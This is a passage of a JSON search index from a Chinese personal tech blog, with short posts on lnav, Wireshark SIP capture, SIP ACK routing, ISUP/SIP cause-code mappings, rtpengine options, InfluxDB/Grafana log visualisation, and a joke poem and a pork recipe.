","title":"食物的酸碱性的误解"},{"content":"大学,编程之师作业,曰:xxx功能,至少代码三千行。\n室友呕心沥血,废寝忘食,东拼西凑。奈何凑到代码一千行。\n友不释然,怏怏不乐。求助于我。\n于告知曰:此事易尔!但需可乐两瓶、瓜子两包。\n友悦之,曰:请稍等,片刻回。\n友即回,代码亦成。\n友黯然道:子之功力,无不及也。\n于笑曰:无他,但手熟尔。\n多加注释多换行,一不留神三千行。\n😂😂😂😂🤣🤣🤣🤣😅😅😅😅\n","permalink":"https://wdd.js.org/posts/2020/03/wyeo4w/","summary":"大学,编程之师作业,曰:xxx功能,至少代码三千行。\n室友呕心沥血,废寝忘食,东拼西凑。奈何凑到代码一千行。\n友不释然,怏怏不乐。求助于我。\n于告知曰:此事易尔!但需可乐两瓶、瓜子两包。\n友悦之,曰:请稍等,片刻回。\n友即回,代码亦成。\n友黯然道:子之功力,无不及也。\n于笑曰:无他,但手熟尔。\n多加注释多换行,一不留神三千行。\n😂😂😂😂🤣🤣🤣🤣😅😅😅😅","title":"代码增肥赋"},{"content":"","permalink":"https://wdd.js.org/posts/2020/03/eaikcr/","summary":"","title":"devicemap 驱动模式修改"},{"content":"lnav, 不需要服务端,不需要设置,仍然功能强大到没有朋友。\n速度与性能 lnav是一个可以运行在终端上的日志分析工具。功能非常强大,如果grep和tail等命令无法满足你的需求,或许你可以尝试一下lnav。\nlnav的官方仓库是https://github.com/tstack/lnav,在mac上可以使用 brew install lnav 
命令安装这个命令。\n在我的4C8G的Macbook Pro上,打开一个2.8G的日志文件到渲染出现,需要花费约40s,平均每秒载入超过70MB。载入日志和渲染时,使用了接近100%的CPU。渲染完毕,使用1.2G的内存空间。\n总之呢,这个工具载入日志的速度很快。但是最好不要再生产环境上使用这个命令载入过大的日志文件,否则可能造成系统资源消耗太大的问题。\n在载入2.8G的日志文件后(3200多万行),过滤时显得非常卡顿,但是查看日志并不卡顿。\n在lnav的搜索关键字,下次打开其他日志时,lnav会自动搜索这个关键词。这是它的Session记录功能,可以使用Ctrl+R重置Session。\nlnav的特点\n语法高亮 各种过滤条件 多关键词过滤 各种快捷跳转 自带统计和可视化功能,比如使用条形图展示单位时间内的报错和日志数量 自动日志格式检查。支持很多种日志格式 能够按照时间去过滤日志 TAB自动补全 实时操作 支持SQL语法查日志 支持文件导出成其他格式 支持直接打开tar.gz等压缩后的日志文件 支持很多快捷键 x下面是按天的日志统计,灰色是普通日志,黄色是告警日志,红色的错误日志。三种颜色叠加的长度就是总日志。时间跨度单位也是可以调节的。最大跨度是一天,最短跨度是1秒。\n仍然是日志格式 自动日志格式检测 系统日志 Web服务器访问日志 报错日志 等等 过滤 可以设置多个过滤规则 时间线过滤 精确时间的日志 上个小时,下个小时 上一分钟,下一分钟 能够按照时间去追踪日志\n按照时间周期统计 统计每秒出现的错误,告警和总日志的量 语法高亮 Tab键自动补全 参考 https://lnav.readthedocs.io/en/latest/ 如果你更喜欢GUI工具,那也可以试试https://github.com/nickbnf/glogg 后记 最近因为工作需要,每天都会去排查很多的日志文件。我也曾想过装ELK之类的工具,但是我收到是文件。日志文件要转存到ELK中也要花功夫。另外ELK也是非常耗费资源的。ELK部署到一半我就果断放弃了。\n与其南辕北辙,不如回归本质。找些命令行的小工具直接分析日志文件。\n","permalink":"https://wdd.js.org/posts/2020/03/wikbh8/","summary":"lnav, 不需要服务端,不需要设置,仍然功能强大到没有朋友。\n速度与性能 lnav是一个可以运行在终端上的日志分析工具。功能非常强大,如果grep和tail等命令无法满足你的需求,或许你可以尝试一下lnav。\nlnav的官方仓库是https://github.com/tstack/lnav,在mac上可以使用 brew install lnav 命令安装这个命令。\n在我的4C8G的Macbook Pro上,打开一个2.8G的日志文件到渲染出现,需要花费约40s,平均每秒载入超过70MB。载入日志和渲染时,使用了接近100%的CPU。渲染完毕,使用1.2G的内存空间。\n总之呢,这个工具载入日志的速度很快。但是最好不要再生产环境上使用这个命令载入过大的日志文件,否则可能造成系统资源消耗太大的问题。\n在载入2.8G的日志文件后(3200多万行),过滤时显得非常卡顿,但是查看日志并不卡顿。\n在lnav的搜索关键字,下次打开其他日志时,lnav会自动搜索这个关键词。这是它的Session记录功能,可以使用Ctrl+R重置Session。\nlnav的特点\n语法高亮 各种过滤条件 多关键词过滤 各种快捷跳转 自带统计和可视化功能,比如使用条形图展示单位时间内的报错和日志数量 自动日志格式检查。支持很多种日志格式 能够按照时间去过滤日志 TAB自动补全 实时操作 支持SQL语法查日志 支持文件导出成其他格式 支持直接打开tar.gz等压缩后的日志文件 支持很多快捷键 x下面是按天的日志统计,灰色是普通日志,黄色是告警日志,红色的错误日志。三种颜色叠加的长度就是总日志。时间跨度单位也是可以调节的。最大跨度是一天,最短跨度是1秒。\n仍然是日志格式 自动日志格式检测 系统日志 Web服务器访问日志 报错日志 等等 过滤 可以设置多个过滤规则 时间线过滤 精确时间的日志 上个小时,下个小时 上一分钟,下一分钟 能够按照时间去追踪日志\n按照时间周期统计 统计每秒出现的错误,告警和总日志的量 语法高亮 Tab键自动补全 参考 https://lnav.readthedocs.io/en/latest/ 如果你更喜欢GUI工具,那也可以试试https://github.com/nickbnf/glogg 后记 
最近因为工作需要,每天都会去排查很多的日志文件。我也曾想过装ELK之类的工具,但是我收到的是文件。日志文件要转存到ELK中也要花功夫。另外ELK也是非常耗费资源的。ELK部署到一半我就果断放弃了。\n与其南辕北辙,不如回归本质。找些命令行的小工具直接分析日志文件。","title":"命令行日志查看神器:lnav"},{"content":"图解包在TCP/IP各个协议栈的流动情况\n","permalink":"https://wdd.js.org/network/mlepcg/","summary":"图解包在TCP/IP各个协议栈的流动情况","title":"网络包的封装和分用"},{"content":"1. 打开wireshark,并选择网卡 在过滤条件中输入sip 2. 选择电话-\u0026gt; VoIP Calls 3. 选中一条呼叫记录-\u0026gt;然后点击 Flow Sequence 4. 查看消息的详情 ","permalink":"https://wdd.js.org/opensips/tools/wireshark-sip/","summary":"1. 打开wireshark,并选择网卡 在过滤条件中输入sip 2. 选择电话-\u0026gt; VoIP Calls 3. 选中一条呼叫记录-\u0026gt;然后点击 Flow Sequence 4. 查看消息的详情 ","title":"Wireshark SIP 抓包"},{"content":"IP协议格式 字段说明 Protocol 表示上层协议,也就是传输层是什么协议。\n只需要看Decimal这列,常用的有6表示TCP, 17表示UDP, 50表示ESP。\n用wireshark抓包的时候,也可以看到Protocol: UDP(17)\n参考 https://tools.ietf.org/html/rfc791 https://tools.ietf.org/html/rfc790 https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers ","permalink":"https://wdd.js.org/network/ip-protocol/","summary":"IP协议格式 字段说明 Protocol 表示上层协议,也就是传输层是什么协议。\n只需要看Decimal这列,常用的有6表示TCP, 17表示UDP, 50表示ESP。\n用wireshark抓包的时候,也可以看到Protocol: UDP(17)\n参考 https://tools.ietf.org/html/rfc791 https://tools.ietf.org/html/rfc790 https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers ","title":"IP协议 Protocol"},{"content":" ","permalink":"https://wdd.js.org/network/ibhy8a/","summary":" ","title":"从飞机航线讲解网络分层"},{"content":"网页上的报错,一般都会和HTTP请求出错有关。 在Chrome浏览器中,按F12或者command+option+i可以打开Dev tools,在网络面板中可以找到报错的HTTP请求。\n通过提交Copy as cURL 和 Copy response的内容,就会非常准确的把问题报告给开发。开发也会非常快速的定位问题。\n","permalink":"https://wdd.js.org/fe/copy-as-curl-and-copy-response/","summary":"网页上的报错,一般都会和HTTP请求出错有关。 在Chrome浏览器中,按F12或者command+option+i可以打开Dev tools,在网络面板中可以找到报错的HTTP请求。\n通过提交Copy as cURL 和 Copy response的内容,就会非常准确的把问题报告给开发。开发也会非常快速的定位问题。","title":"Copy as CURL and Copy Response"},{"content":"1. 选肉 **猪肉,肥瘦相间的五花肉才最好吃。**精瘦肉吃起来会太柴,太肥的肉会显得太腻。五花肉则刚刚好,不柴也不腻。\n2. 炒干 烧好的猪肉中如果有生水的味道,则口感不好,而且会显得肉不够熟。\n3. 
具体步骤 五花肉洗净,切片。放入干净的炒锅中,然后开火烧 将五花肉的水分烧干,并且冒油,肉面发黄 放入姜葱蒜,小米椒,加入生抽,料酒,食盐爆炒。如果猪油比较少,则可以放入适量食用油 然后可以按需加入蔬菜。例如花菜、或者芹菜、或者小青椒 炒到蔬菜9成熟,然后出锅 ","permalink":"https://wdd.js.org/posts/2020/02/edtzzx/","summary":"1. 选肉 **猪肉,肥瘦相间的五花肉才最好吃。**精瘦肉吃起来会太柴,太肥的肉会显得太腻。五花肉则刚刚好,不柴也不腻。\n2. 炒干 烧好的猪肉中如果有生水的味道,则口感不好,而且会显得肉不够熟。\n3. 具体步骤 五花肉洗净,切片。放入干净的炒锅中,然后开火烧 将五花肉的水分烧干,并且冒油,肉面发黄 放入姜葱蒜,小米椒,加入生抽,料酒,食盐爆炒。如果猪油比较少,则可以放入适量食用油 然后可以按需加入蔬菜。例如花菜、或者芹菜、或者小青椒 炒到蔬菜9成熟,然后出锅 ","title":"如何烧肉才好吃"},{"content":"ISUP to SIP ISUP Cause Value SIP Response Normal event 1 – unallocated number 404 Not Found 2 – no route to network 404 Not Found 3 – no route to destination 404 Not Found 16 – normal call clearing \u0026mdash; (*) 17 – user busy 486 Busy here 18 – no user responding 408 Request Timeout 19 – no answer from the user 480 Temporarily unavailable 20 – subscriber absent 480 Temporarily unavailable 21 – call rejected 403 Forbidden (+) 22 – number changed (s/o diagnostic) 410 Gone 23 – redirection to new destination 410 Gone 26 – non-selected user clearing 404 Not Found (=) 27 – destination out of order 502 Bad Gateway 28 – address incomplete 484 Address incomplete 29 – facility rejected 510 Not implemented 31 – normal unspecified 480 Temporarily unavailable Resource unavailable 34 – no circuit available 503 Service unavailable 38 – network out of order 503 Service unavailable 41 – temporary failure 503 Service unavailable 42 – switching equipment congestion 503 Service unavailable 47 – resource unavailable 503 Service unavailable Service or option not available 55 – incoming calls barred within CUG 403 Forbidden 57 – bearer capability not authorized 403 Forbidden 58 – bearer capability not presently available 503 Service unavailable 65 – bearer capability not implemented 488 Not Acceptable here 70 – Only restricted digital information bearer capability is available (National use) 488 Not Acceptable here 79 – service or option not implemented 501 Not implemented Invalid message 87 – user not member of CUG 403 
Forbidden 88 – incompatible destination 503 Service unavailable 102 – Call Setup Time-out Failure 504 Gateway timeout 111 – Protocol Error Unspecified 500 Server internal error Interworking 127 – Internal Error - interworking unspecified 500 Server internal error (*) ISDN Cause 16 will usually result in a BYE or CANCEL(+) If the cause location is user then the 6xx code could be given rather than the 4xx code. the cause value received in the H.225.0 message is unknown in ISUP, the unspecified cause value of the class is sent.(=) ANSI procedure SIP to ISDN Response received Cause value in the REL.\nSIP Status Code ISDN Map 400 - Bad Request 41 – Temporary failure 401 - Unauthorized 21 – Call rejected (*) 402 - Payment required 21 – Call rejected 403 - Forbidden 21 – Call rejected 404 - Not Found 1 – Unallocated number 405 - Method not allowed 63 – Service or option unavailable 406 - Not acceptable 79 – Service/option not implemented (+) 407 - Proxy authentication required 21 – Call rejected (*) 408 - Request timeout 102 – Recovery on timer expiry 410 - Gone 22 – Number changed (w/o diagnostic) 413 - Request Entity too long 127 – Interworking (+) 414 - Request –URI too long 127 – Interworking (+) 415 - Unsupported media type 79 – Service/option not implemented (+) 416 - Unsupported URI Scheme 127 – Interworking (+) 402 - Bad extension 127 – Interworking (+) 421 - Extension Required 127 – Interworking (+) 423 - Interval Too Brief 127 – Interworking (+) 480 - Temporarily unavailable 18 – No user responding 481 - Call/Transaction Does not Exist 41 – Temporary Failure 482 - Loop Detected 25 – Exchange – routing error 483 - Too many hops 25 – Exchange – routing error 484 - Address incomplete 28 – Invalid Number Format (+) 485 - Ambiguous 1 – Unallocated number 486 - Busy here 17 – User Busy 487 - Request Terminated \u0026mdash; (no mapping) 488 - Not Acceptable here \u0026mdash; by warning header 500 - Server internal error 41 – Temporary Failure 501 - Not implemented 79 – 
Not implemented, unspecified 502 - Bad gateway 38 – Network out of order 503 - Service unavailable 41 – Temporary Failure 504 - Service time-out 102 – Recovery on timer expiry 505 - Version Not supported 127 – Interworking (+) 513 - Message Too Large 127 – Interworking (+) 600 - Busy everywhere 17 – User busy 603 - Decline 21 – Call rejected 604 - Does not exist anywhere 1 – Unallocated number 606 - Not acceptable \u0026mdash; by warning header 参考 https://www.dialogic.com/webhelp/BorderNet2020/1.1.0/WebHelp/cause_code_map_ss7_sip.htm ","permalink":"https://wdd.js.org/opensips/ch9/isup-sip-isdn/","summary":"ISUP to SIP ISUP Cause Value SIP Response Normal event 1 – unallocated number 404 Not Found 2 – no route to network 404 Not Found 3 – no route to destination 404 Not Found 16 – normal call clearing \u0026mdash; (*) 17 – user busy 486 Busy here 18 – no user responding 408 Request Timeout 19 – no answer from the user 480 Temporarily unavailable 20 – subscriber absent 480 Temporarily unavailable 21 – call rejected 403 Forbidden (+) 22 – number changed (s/o diagnostic) 410 Gone 23 – redirection to new destination 410 Gone 26 – non-selected user clearing 404 Not Found (=) 27 – destination out of order 502 Bad Gateway 28 – address incomplete 484 Address incomplete 29 – facility rejected 510 Not implemented 31 – normal unspecified 480 Temporarily unavailable Resource unavailable 34 – no circuit available 503 Service unavailable 38 – network out of order 503 Service unavailable 41 – temporary failure 503 Service unavailable 42 – switching equipment congestion 503 Service unavailable 47 – resource unavailable 503 Service unavailable Service or option not available 55 – incoming calls barred within CUG 403 Forbidden 57 – bearer capability not authorized 403 Forbidden 58 – bearer capability not presently available 503 Service unavailable 65 – bearer capability not implemented 488 Not Acceptable here 70 – Only restricted digital information bearer capability is available 
(National use) 488 Not Acceptable here 79 – service or option not implemented 501 Not implemented Invalid message 87 – user not member of CUG 403 Forbidden 88 – incompatible destination 503 Service unavailable 102 – Call Setup Time-out Failure 504 Gateway timeout 111 – Protocol Error Unspecified 500 Server internal error Interworking 127 – Internal Error - interworking unspecified 500 Server internal error (*) ISDN Cause 16 will usually result in a BYE or CANCEL(+) If the cause location is user then the 6xx code could be given rather than the 4xx code.","title":"ISUP SIP ISDN对照码表"},{"content":"帮助文档 Usage: rtpengine [OPTION...] - next-generation media proxy Application Options: -v, \u0026ndash;version Print build time and exit \u0026ndash;config-file=FILE Load config from this file \u0026ndash;config-section=STRING Config file section to use \u0026ndash;log-facility=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging **-L, \u0026ndash;log-level=INT ** Mask log priorities above this level 取值从0-7, 7 debug 6 info 5 notice **-E, \u0026ndash;log-stderr ** Log on stderr instead of syslog \u0026ndash;no-log-timestamps Drop timestamps from log lines to stderr \u0026ndash;log-mark-prefix Prefix for sensitive log info \u0026ndash;log-mark-suffix Suffix for sensitive log info **-p, \u0026ndash;pidfile=FILE ** Write PID to file **-f, \u0026ndash;foreground ** Don\u0026rsquo;t fork to background -t, \u0026ndash;table=INT Kernel table to use -F, \u0026ndash;no-fallback Only start when kernel module is available **-i, \u0026ndash;interface=[NAME/]IP[!IP] ** Local interface for RTP -k, \u0026ndash;subscribe-keyspace=INT INT \u0026hellip; Subscription keyspace list -l, \u0026ndash;listen-tcp=[IP:]PORT TCP port to listen on -u, \u0026ndash;listen-udp=[IP46|HOSTNAME:]PORT UDP port to listen on -n, \u0026ndash;listen-ng=[IP46|HOSTNAME:]PORT UDP port to listen on, NG protocol **-c, \u0026ndash;listen-cli=[IP46|HOSTNAME:]PORT ** UDP port to listen on, CLI -g, 
\u0026ndash;graphite=IP46|HOSTNAME:PORT Address of the graphite server -G, \u0026ndash;graphite-interval=INT Graphite send interval in seconds \u0026ndash;graphite-prefix=STRING Prefix for graphite line -T, \u0026ndash;tos=INT Default TOS value to set on streams \u0026ndash;control-tos=INT Default TOS value to set on control-ng -o, \u0026ndash;timeout=SECS RTP timeout -s, \u0026ndash;silent-timeout=SECS RTP timeout for muted -a, \u0026ndash;final-timeout=SECS Call timeout \u0026ndash;offer-timeout=SECS Timeout for incomplete one-sided calls **-m, \u0026ndash;port-min=INT ** Lowest port to use for RTP **-M, \u0026ndash;port-max=INT ** Highest port to use for RTP -r, \u0026ndash;redis=[PW@]IP:PORT/INT Connect to Redis database -w, \u0026ndash;redis-write=[PW@]IP:PORT/INT Connect to Redis write database \u0026ndash;redis-num-threads=INT Number of Redis restore threads \u0026ndash;redis-expires=INT Expire time in seconds for redis keys -q, \u0026ndash;no-redis-required Start no matter of redis connection state \u0026ndash;redis-allowed-errors=INT Number of allowed errors before redis is temporarily disabled \u0026ndash;redis-disable-time=INT Number of seconds redis communication is disabled because of errors \u0026ndash;redis-cmd-timeout=INT Sets a timeout in milliseconds for redis commands \u0026ndash;redis-connect-timeout=INT Sets a timeout in milliseconds for redis connections -b, \u0026ndash;b2b-url=STRING XMLRPC URL of B2B UA \u0026ndash;log-facility-cdr=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging CDRs \u0026ndash;log-facility-rtcp=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging RTCP \u0026ndash;log-facility-dtmf=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging DTMF \u0026ndash;log-format=default|parsable Log prefix format \u0026ndash;dtmf-log-dest=IP46|HOSTNAME:PORT Destination address for DTMF logging via UDP -x, \u0026ndash;xmlrpc-format=INT XMLRPC timeout request format to use. 
0: SEMS DI, 1: call-id only, 2: Kamailio \u0026ndash;num-threads=INT Number of worker threads to create \u0026ndash;media-num-threads=INT Number of worker threads for media playback -d, \u0026ndash;delete-delay=INT Delay for deleting a session from memory. \u0026ndash;sip-source Use SIP source address by default \u0026ndash;dtls-passive Always prefer DTLS passive role \u0026ndash;max-sessions=INT Limit of maximum number of sessions \u0026ndash;max-load=FLOAT Reject new sessions if load averages exceeds this value \u0026ndash;max-cpu=FLOAT Reject new sessions if CPU usage (in percent) exceeds this value \u0026ndash;max-bandwidth=INT Reject new sessions if bandwidth usage (in bytes per second) exceeds this value \u0026ndash;homer=IP46|HOSTNAME:PORT Address of Homer server for RTCP stats \u0026ndash;homer-protocol=udp|tcp Transport protocol for Homer (default udp) \u0026ndash;homer-id=INT \u0026lsquo;Capture ID\u0026rsquo; to use within the HEP protocol \u0026ndash;recording-dir=FILE Directory for storing pcap and metadata files \u0026ndash;recording-method=pcap|proc Strategy for call recording \u0026ndash;recording-format=raw|eth File format for stored pcap files \u0026ndash;iptables-chain=STRING Add explicit firewall rules to this iptables chain \u0026ndash;codecs Print a list of supported codecs and exit \u0026ndash;scheduling=default|none|fifo|rr|other|batch|idle Thread scheduling policy \u0026ndash;priority=INT Thread scheduling priority \u0026ndash;idle-scheduling=default|none|fifo|rr|other|batch|idle Idle thread scheduling policy \u0026ndash;idle-priority=INT Idle thread scheduling priority \u0026ndash;log-srtp-keys Log SRTP keys to error log \u0026ndash;mysql-host=HOST|IP MySQL host for stored media files \u0026ndash;mysql-port=INT MySQL port \u0026ndash;mysql-user=USERNAME MySQL connection credentials \u0026ndash;mysql-pass=PASSWORD MySQL connection credentials \u0026ndash;mysql-query=STRING MySQL select query 
\u0026ndash;endpoint-learning=delayed|immediate|off|heuristic RTP endpoint learning algorithm \u0026ndash;jitter-buffer=INT Size of jitter buffer \u0026ndash;jb-clock-drift Compensate for source clock drift 参考 https://github.com/sipwise/rtpengine ","permalink":"https://wdd.js.org/opensips/ch9/rtpengine-manu/","summary":"帮助文档 Usage: rtpengine [OPTION...] - next-generation media proxy Application Options: -v, \u0026ndash;version Print build time and exit \u0026ndash;config-file=FILE Load config from this file \u0026ndash;config-section=STRING Config file section to use \u0026ndash;log-facility=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging **-L, \u0026ndash;log-level=INT ** Mask log priorities above this level 取值从0-7, 7 debug 6 info 5 notice **-E, \u0026ndash;log-stderr ** Log on stderr instead of syslog \u0026ndash;no-log-timestamps Drop timestamps from log lines to stderr \u0026ndash;log-mark-prefix Prefix for sensitive log info \u0026ndash;log-mark-suffix Suffix for sensitive log info **-p, \u0026ndash;pidfile=FILE ** Write PID to file **-f, \u0026ndash;foreground ** Don\u0026rsquo;t fork to background -t, \u0026ndash;table=INT Kernel table to use -F, \u0026ndash;no-fallback Only start when kernel module is available **-i, \u0026ndash;interface=[NAME/]IP[!","title":"rtpengine"},{"content":"ACK的特点 ACK仅用于对INVITE消息的最终响应进行确认 ACK的CSeq的号码必须和INVITE的CSeq号码相同,这是用来保证ACK对哪一个INVITE进行确认的唯一标志。另外CSeq的方法会改为ACK ACK分为两种 失败请求的确认;例如对4XX, 5XX请求的确认。在对失败的请求进行确认时,ACK是逐跳的。 成功的请求的确认;对200的确认,此时ACK是端到端的。 ACK一般不会带有SDP信息。如果INVITE消息没有带有SDP,那么ACK消息中一般会带有SDP ACK与事务的关系 如果请求成功,那么后续的ACK消息是单独的事务 如果请求失败,那么后续的ACK消息和之前的INVITE是属于相同的事务 逐跳ACK VS 端到端ACK 逐跳在英文中叫做: hop-by-hop端到端在英文中叫做:end-to-end\nACK如何路由 ack是序列化请求,所谓序列化请求,是指sip to 字段中已经有tag。有to tag是到达对端的唯一标志。\n没有to tag请求称为初始化请求,有totag称为序列化请求。\n初始化请求做路径发现,往往需要做一些数据库查询,DNS查询。而序列化请求不需要查询数据库,因为路径已经发现过了。\n实战场景:分机A, SIP服务器S, 分机B, A呼叫B,详细介绍一下到ACK的过程。\n分机A向SIP服务器S发送请求:INVITE B SIP服务器 首先在数据库中查找B的实际注册地址 修改Contact头为分机A的外网地址和端口。由于存在NAT, 
分机A一般不知道自己的公网地址。 record_route 将消息发送给B 分机B: 收到来自SIP服务器的INVITE消息 从INVITE中取出Contact, 获取对端的,其实也就是分机A的实际地址 如果所有条件都满足,分机B会向SIP服务器发送180响应,然后发送200响应 由于180响应和200响应和INVITE都属于一个事务,响应会按照Via的地址,先发送给SIP服务器 SIP服务器: SIP服务器会首先修改180响应的Contact头,把分机B的内网地址改为外网地址 SIP服务器根据Via头,将消息发送给分机A 对于200 OK的消息,和180的处理是相同的 分机A: 分机收到180消息后,从Contact头中能够获取分机B的外网地址 分机A在发送ACK时,request url地址是分机B的地址,但是由于sip服务器的record_route动作首先会将消息发送给SIP服务器,SIP服务器会按照request url的地址,将ack发送给分机B。 ACK的路由不需要做数据库查询,ACK的request url一般是对端UAC的地址。在存在route头时,ACK会按照route字段去路由。\nACK丢失了会怎样? 如果被叫在一定时间内没有收到ACK, 那么被叫会周期性的重发200OK。如果在超时的时候,还没有收到ACK, 就会发送BYE消息来挂断呼叫。很多呼叫在30秒自动挂断,往往就是因为丢失了ACK。\n那么ACK为什么会丢失呢?可能有以下的原因,大部分原因和NAT有关!\nSIP服务器没有做fix_nat_contact, 导致主叫可能不知道实际被叫的外网地址 ACK与媒体流的关系 并不是说被叫收到ACK后,媒体流才开始。往往在180或者183时,双方已经能够听到对方的声音了。\n","permalink":"https://wdd.js.org/opensips/ch1/sip-ack/","summary":"ACK的特点 ACK仅用于对INVITE消息的最终响应进行确认 ACK的CSeq的号码必须和INVITE的CSeq号码相同,这是用来保证ACK对哪一个INVITE进行确认的唯一标志。另外CSeq的方法会改为ACK ACK分为两种 失败请求的确认;例如对4XX, 5XX请求的确认。在对失败的请求进行确认时,ACK是逐跳的。 成功的请求的确认;对200的确认,此时ACK是端到端的。 ACK一般不会带有SDP信息。如果INVITE消息没有带有SDP,那么ACK消息中一般会带有SDP ACK与事务的关系 如果请求成功,那么后续的ACK消息是单独的事务 如果请求失败,那么后续的ACK消息和之前的INVITE是属于相同的事务 逐跳ACK VS 端到端ACK 逐跳在英文中叫做: hop-by-hop端到端在英文中叫做:end-to-end\nACK如何路由 ack是序列化请求,所谓序列化请求,是指sip to 字段中已经有tag。有to tag是到达对端的唯一标志。\n没有to tag请求称为初始化请求,有totag称为序列化请求。\n初始化请求做路径发现,往往需要做一些数据库查询,DNS查询。而序列化请求不需要查询数据库,因为路径已经发现过了。\n实战场景:分机A, SIP服务器S, 分机B, A呼叫B,详细介绍一下到ACK的过程。\n分机A向SIP服务器S发送请求:INVITE B SIP服务器 首先在数据库中查找B的实际注册地址 修改Contact头为分机A的外网地址和端口。由于存在NAT, 分机A一般不知道自己的公网地址。 record_route 将消息发送给B 分机B: 收到来自SIP服务器的INVITE消息 从INVITE中取出Contact, 获取对端的,其实也就是分机A的实际地址 如果所有条件都满足,分机B会向SIP服务器发送180响应,然后发送200响应 由于180响应和200响应和INVITE都属于一个事务,响应会按照Via的地址,先发送给SIP服务器 SIP服务器: SIP服务器会首先修改180响应的Contact头,把分机B的内网地址改为外网地址 SIP服务器根据Via头,将消息发送给分机A 对于200 OK的消息,和180的处理是相同的 分机A: 分机收到180消息后,从Contact头中能够获取分机B的外网地址 分机A在发送ACK时,request url地址是分机B的地址,但是由于sip服务器的record_route动作首先会将消息发送给SIP服务器,SIP服务器会按照request url的地址,将ack发送给分机B。 ACK的路由不需要做数据库查询,ACK的request 
url一般是对端UAC的地址。在存在route头时,ACK会按照route字段去路由。\nACK丢失了会怎样? 如果被叫在一定时间内没有收到ACK, 那么被叫会周期性的重发200OK。如果在超时的时候,还没有收到ACK, 就会发送BYE消息来挂断呼叫。很多呼叫在30秒自动挂断,往往就是因为丢失了ACK。\n那么ACK为什么会丢失呢?可能有以下的原因,大部分原因和NAT有关!\nSIP服务器没有做fix_nat_contact, 导致主叫可能不知道实际被叫的外网地址 ACK与媒体流的关系 并不是说被叫收到ACK后,媒体流才开始。往往在180或者183时,双方已经能够听到对方的声音了。","title":"深入理解SIP ACK 方法"},{"content":"数据规整 我的数据来源一般都是来自于日志文件,不同的日志文件格式可能都不相同。所以第一步就是把数据抽取出来,并且格式化。\n一般情况下我会用grep或者awk进行初步的整理。如果shell脚本处理不太方便,通常我会写个js脚本。\nNode.js的readline可以实现按行取出。处理过后的输出依然是写文件。\nconst readline = require(\u0026#39;readline\u0026#39;) const fs = require(\u0026#39;fs\u0026#39;) const dayjs = require(\u0026#39;dayjs\u0026#39;) const fileName = \u0026#39;data.log\u0026#39; const batch = dayjs().format(\u0026#39;MMDDHHmmss\u0026#39;) const dist = fs.createWriteStream(`${fileName}.out`) const rl = readline.createInterface({ input: fs.createReadStream(fileName) }) rl.on(\u0026#39;line\u0026#39;, handlerLine) function handlerLine (line) { let info = line.split(\u0026#39; \u0026#39;) let time = dayjs(`2020-${info[0]} ${info[1]}`).valueOf() let log = `rtpproxy,tag=b${batch} socket=${info[2]},mem=${info[3]} ${time}000000\\n` console.log(log) dist.write(log) } 输出的文件格式如下,至于为什么是这种格式,且看下文分晓。\nrtpproxy,tag=b0216014954 socket=691,mem=3106936 1581477499000000000 rtpproxy,tag=b0216014954 socket=615,mem=3109328 1581477648000000000 rtpproxy,tag=b0216014954 socket=669,mem=3113764 1581477901000000000 rtpproxy,tag=b0216014954 socket=701,mem=3114820 1581477961000000000 数据导入 以前我都会把数据规整后的输出写成一个JSON文件,然后写html页面,引入Echarts库,进行数据可视化。\n但是这种方式过于繁琐,每次都要写个Echarts的Options。\n所以我想,如果把数据写入influxdb,然后用grafana去做可视化,那岂不是十分方便。\n所以,我们要把数据导入influxdb。\n启动influxdb grafana 下面是一个Makefile, 用来启动容器。\nmake create-network 用来创建两个容器的网络,这样grafana就可以通过容器名访问influxdb了。 make run-influxdb 启动influxdb,其中8086端口是influxdb对外提供服务的端口 make run-grafana 启动grafana, 其中3000端口是grafana对外提供服务的端口 run-influxdb: docker run -d -p 8083:8083 -p 8086:8086 --network b2 --name influxdb influxdb:latest run-grafana: docker run -d --name grafana 
--network b2 -p 3000:3000 grafana/grafana create-network: docker network create -d bridge --ip-range=192.168.1.0/24 --gateway=192.168.1.1 --subnet=192.168.1.0/24 b2 接着你打开localhost:3000端口,输入默认的用户名密码 admin/admin来登录\n创建默认的数据库\n进入influxdb的容器中创建数据库\ndocker exec -it influxdb bash influx create database mydb grafana中添加influxdb数据源\n使用curl上传数据到influxdb\ncurl -i -XPOST \u0026#34;http://localhost:8086/write?db=mydb\u0026#34; --data-binary @data.log.out grafana上添加dashboard 结论 通过使用influxdb来存储数据,grafana来做可视化。每次需要分析的时候,我需要做的仅仅只是写个脚本去规整数据,这样就大大提高了分析效率。\n","permalink":"https://wdd.js.org/posts/2020/02/mrgkvf/","summary":"数据规整 我的数据来源一般都是来自于日志文件,不同的日志文件格式可能都不相同。所以第一步就是把数据抽取出来,并且格式化。\n一般情况下我会用grep或者awk进行初步的整理。如果shell脚本处理不太方便,通常我会写个js脚本。\nNode.js的readline可以实现按行取出。处理过后的输出依然是写文件。\nconst readline = require(\u0026#39;readline\u0026#39;) const fs = require(\u0026#39;fs\u0026#39;) const dayjs = require(\u0026#39;dayjs\u0026#39;) const fileName = \u0026#39;data.log\u0026#39; const batch = dayjs().format(\u0026#39;MMDDHHmmss\u0026#39;) const dist = fs.createWriteStream(`${fileName}.out`) const rl = readline.createInterface({ input: fs.createReadStream(fileName) }) rl.on(\u0026#39;line\u0026#39;, handlerLine) function handlerLine (line) { let info = line.split(\u0026#39; \u0026#39;) let time = dayjs(`2020-${info[0]} ${info[1]}`).valueOf() let log = `rtpproxy,tag=b${batch} socket=${info[2]},mem=${info[3]} ${time}000000\\n` console.log(log) dist.write(log) } 输出的文件格式如下,至于为什么是这种格式,且看下文分晓。\nrtpproxy,tag=b0216014954 socket=691,mem=3106936 1581477499000000000 rtpproxy,tag=b0216014954 socket=615,mem=3109328 1581477648000000000 rtpproxy,tag=b0216014954 socket=669,mem=3113764 1581477901000000000 rtpproxy,tag=b0216014954 socket=701,mem=3114820 1581477961000000000 数据导入 以前我都会把数据规整后的输出写成一个JSON文件,然后写html页面,引入Echarts库,进行数据可视化。","title":"我的数据可视化处理过程"},{"content":"特征维度 特征项 集中 
